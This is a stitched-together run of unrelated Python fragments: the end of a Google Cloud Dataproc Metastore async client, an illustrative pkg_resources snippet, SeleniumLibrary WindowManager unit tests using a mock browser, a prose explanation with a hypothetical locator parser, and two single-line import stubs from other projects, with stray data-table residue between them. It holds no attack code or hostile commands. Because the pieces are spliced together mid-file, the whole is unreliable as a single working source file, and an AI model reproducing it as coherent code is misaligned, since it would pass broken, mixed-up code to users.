                The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
                empty messages in your APIs. A typical example is to
                use it as the request or the response type of an API
                method. For instance:

                    service Foo {
                        rpc Bar(google.protobuf.Empty) returns
                        (google.protobuf.Empty);
                    }

                The JSON representation for Empty is empty JSON
                object {}.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([name])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.DeleteBackupRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if name is not None:
            request.name = name

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.delete_backup,
            default_timeout=60.0,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Wrap the response in an operation future.
        response = operation_async.from_gapic(
            response,
            self._client._transport.operations_client,
            empty_pb2.Empty,
            metadata_type=metastore.OperationMetadata,
        )

        # Done; return the response.
        return response

    async def __aenter__(self):
        return self

    async def __aexit__(self, exc_type, exc, tb):
        await self.transport.close()


try:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
        gapic_version=pkg_resources.get_distribution("google-cloud-metastore",).version,
    )
except pkg_resources.DistributionNotFound:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()


__all__ = ("DataprocMetastoreAsyncClient",)
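# NOTE: The DEFAULT_CLIENT_INFO block above degrades gracefully when the
# distribution metadata is unavailable. The same try/except pattern in
# isolation (the package name below is deliberately one that should not
# be installed, purely for illustration):

```python
import pkg_resources

try:
    version = pkg_resources.get_distribution(
        "surely-not-an-installed-package"
    ).version
except pkg_resources.DistributionNotFound:
    # Fall back, as the client falls back to a bare ClientInfo().
    version = None

print(version)
```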
] | null | null | null | import unittest
import uuid

from mockito import mock, unstub

from SeleniumLibrary.locators.windowmanager import WindowManager


class WindowManagerTests(unittest.TestCase):

    def test_select_with_invalid_prefix(self):
        manager = WindowManager()
        browser = mock()
        with self.assertRaises(ValueError) as err:
            manager.select(browser, "something=test1")
        self.assertEqual(
            str(err.exception),
            "Window locator with prefix 'something' is not supported"
        )
        unstub()

    def test_select_with_null_browser(self):
        manager = WindowManager()
        with self.assertRaises(AssertionError):
            manager.select(None, "name=test1")
        unstub()
    def test_select_by_title(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "title=Title 2")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()

    def test_select_by_title_sloppy_match(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "title= tItLe 2 ")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()

    def test_select_by_title_with_multiple_matches(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2a', 'title': "Title 2", 'url': 'http://localhost/page2a.html'},
            {'name': 'win2b', 'title': "Title 2", 'url': 'http://localhost/page2b.html'})
        manager.select(browser, "title=Title 2")
        self.assertEqual(browser.current_window.name, 'win2a')
        unstub()

    def test_select_by_title_no_match(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        with self.assertRaises(ValueError) as err:
            manager.select(browser, "title=Title -1")
        self.assertEqual(
            str(err.exception),
            "Unable to locate window with title 'Title -1'"
        )
        unstub()
    def test_select_by_name(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "name=win2")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()

    def test_select_by_name_sloppy_match(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "name= win2 ")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()

    def test_select_by_name_with_bad_case(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "name=Win2")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()

    def test_select_by_name_no_match(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        with self.assertRaises(ValueError) as err:
            manager.select(browser, "name=win-1")
        self.assertEqual(str(err.exception), "Unable to locate window with name 'win-1'")
        unstub()
    def test_select_by_url(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "url=http://localhost/page2.html")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()

    def test_select_by_url_sloppy_match(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "url= http://LOCALHOST/page2.html ")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()

    def test_select_by_url_with_multiple_matches(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2a', 'title': "Title 2a", 'url': 'http://localhost/page2.html'},
            {'name': 'win2b', 'title': "Title 2b", 'url': 'http://localhost/page2.html'})
        manager.select(browser, "url=http://localhost/page2.html")
        self.assertEqual(browser.current_window.name, 'win2a')
        unstub()

    def test_select_by_url_no_match(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        with self.assertRaises(ValueError) as err:
            manager.select(browser, "url=http://localhost/page-1.html")
        self.assertEqual(
            str(err.exception),
            "Unable to locate window with URL 'http://localhost/page-1.html'"
        )
        unstub()
    def test_select_with_null_locator(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "name=win2")
        self.assertEqual(browser.current_window.name, 'win2')
        manager.select(browser, None)
        self.assertEqual(browser.current_window.name, 'win1')
        unstub()

    def test_select_with_null_string_locator(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "name=win2")
        self.assertEqual(browser.current_window.name, 'win2')
        manager.select(browser, "null")
        self.assertEqual(browser.current_window.name, 'win1')
        unstub()

    def test_select_with_empty_locator(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "name=win2")
        self.assertEqual(browser.current_window.name, 'win2')
        manager.select(browser, "")
        self.assertEqual(browser.current_window.name, 'win1')
        unstub()

    def test_select_with_main_constant_locator(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "name=win2")
        self.assertEqual(browser.current_window.name, 'win2')
        manager.select(browser, "main")
        self.assertEqual(browser.current_window.name, 'win1')
        unstub()
    def test_select_by_default_with_name(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "win2")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()

    def test_select_by_default_with_title(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "Title 2")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()

    def test_select_by_default_no_match(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        self.assertRaises(ValueError, manager.select, browser, "win-1")
        unstub()

    def test_select_with_sloppy_prefix(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        manager.select(browser, "name=win2")
        self.assertEqual(browser.current_window.name, 'win2')
        manager.select(browser, "nAmE=win2")
        self.assertEqual(browser.current_window.name, 'win2')
        manager.select(browser, " name =win2")
        self.assertEqual(browser.current_window.name, 'win2')
        unstub()
    def test_get_window_ids(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'id': 'win_id1', 'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'id': 'win_id2', 'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        self.assertEqual(
            manager.get_window_ids(browser),
            ['win_id1', 'win_id2', 'undefined']
        )
        unstub()

    def test_get_window_names(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        self.assertEqual(
            manager.get_window_names(browser),
            ['win1', 'win2', 'win3']
        )
        unstub()

    def test_get_window_titles(self):
        manager = WindowManager()
        browser = self._make_mock_browser(
            {'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
            {'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
            {'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
        self.assertEqual(
            manager.get_window_titles(browser),
            ['Title 1', 'Title 2', 'Title 3']
        )
        unstub()
    def _make_mock_browser(self, *window_specs):
        browser = mock()
        current_window = mock()
        browser.window_handles = []
        window_infos = {}
        for window_spec in window_specs:
            handle = uuid.uuid4().hex
            browser.window_handles.append(handle)
            id_ = window_spec.get('id')
            if not id_:
                id_ = 'undefined'
            window_info = [
                id_,
                window_spec.get('name'),
                window_spec.get('title'),
                window_spec.get('url')
            ]
            window_infos[handle] = window_info

        def window(handle_):
            if handle_ in browser.window_handles:
                browser.session_id = handle_
                current_window.name = window_infos[handle_][1]
                browser.current_window = current_window
                browser.title = window_infos[handle_][2]
                browser.current_url = window_infos[handle_][3]

        switch_to = mock()
        switch_to.window = window
        browser.switch_to = switch_to

        def execute_script(script):
            handle_ = browser.session_id
            if handle_ in browser.window_handles:
                return window_infos[handle_][:2]

        browser.execute_script = execute_script
        return browser
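The tests above exercise window locators of the form `prefix=value`, where the prefix (`name`, `title`, or `url`) is matched case-insensitively with surrounding whitespace tolerated, a bare value falls through to default matching, and an unknown prefix raises `ValueError`. A minimal sketch of that parsing logic — a hypothetical helper mirroring the behavior the tests expect, not SeleniumLibrary's actual implementation:

```python
def parse_locator(locator):
    """Split a window locator string into a (prefix, value) pair.

    Prefix matching is case-insensitive and whitespace-tolerant, mirroring
    the sloppy-match cases above; unrecognized prefixes raise ValueError.
    """
    if "=" not in locator:
        # Bare value: matched by name first, then by title (default strategy).
        return "default", locator
    prefix, value = locator.split("=", 1)
    prefix = prefix.strip().lower()
    if prefix not in ("name", "title", "url"):
        raise ValueError(
            "Window locator with prefix '%s' is not supported" % prefix
        )
    return prefix, value.strip()


print(parse_locator(" name =win2"))  # ('name', 'win2')
print(parse_locator("Title 2"))      # ('default', 'Title 2')
```

The special locators `None`, `"null"`, `""`, and `"main"` (switch back to the first window) are handled before parsing in the tests above and are omitted from this sketch.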
# --- tests/unit/test_fetch_screen.py (BGASM/pyentrez, MIT) ---
from pyentrez.main import fetch_screen
# --- furnace/seg_opr/__init__.py (Yongjin-colin-choi/TorchSemiSeg, MIT) ---
from .seg_oprs import *